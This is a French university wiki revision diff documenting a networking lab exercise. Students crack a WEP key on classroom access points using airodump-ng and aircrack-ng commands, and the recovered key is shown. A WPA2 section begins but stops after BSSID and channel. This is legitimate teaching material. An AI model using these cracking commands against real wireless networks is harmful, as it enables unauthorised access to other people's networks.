« Atelier SysRes SE5 2023/2024 E4 » : différence entre les versions
Aller à la navigation
Aller à la recherche
Ligne 9 : | Ligne 9 : | ||
CH: 2 | CH: 2 | ||
Lancement de l'écoute avec la commande : airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5C -w output wlan0 | Lancement de l'écoute avec la commande : <syntaxhighlight lang="bash"> airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5C -w output wlan0 </syntaxhighlight> | ||
[[Fichier:Data wep cracotte13.png]] | [[Fichier:Data wep cracotte13.png]] | ||
Décryptage de la clé avec la commande : aircrack-ng --b 04:DA:D2:9C:50:5C output*.cap | Décryptage de la clé avec la commande : <syntaxhighlight lang="bash"> aircrack-ng --b 04:DA:D2:9C:50:5C output*.cap </syntaxhighlight> | ||
[[Fichier:Key found cracotte13.png]] | [[Fichier:Key found cracotte13.png]] | ||
La clé WEP: [ FF:FF:FF:FF:FA:BC:14:CB:AE:EE:EE:EE:EE ] | La clé WEP: [ FF:FF:FF:FF:FA:BC:14:CB:AE:EE:EE:EE:EE ] | ||
=Craquage d'une clé WPA2= | =Craquage d'une clé WPA2= | ||
Version du 17 janvier 2024 à 22:20
Cibles
cracotte13 et kracotte13 depuis la zabeth10.
Craquage d'une clé WEP
BSSID: 04:DA:D2:9C:50:5C
CH: 2
Lancement de l'écoute avec la commande :
airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5C -w output wlan0
Décryptage de la clé avec la commande :
aircrack-ng --b 04:DA:D2:9C:50:5C output*.cap
La clé WEP: [ FF:FF:FF:FF:FA:BC:14:CB:AE:EE:EE:EE:EE ]
Craquage d'une clé WPA2
BSSID: 44:AD:D9:5F:87:0C
CH: 13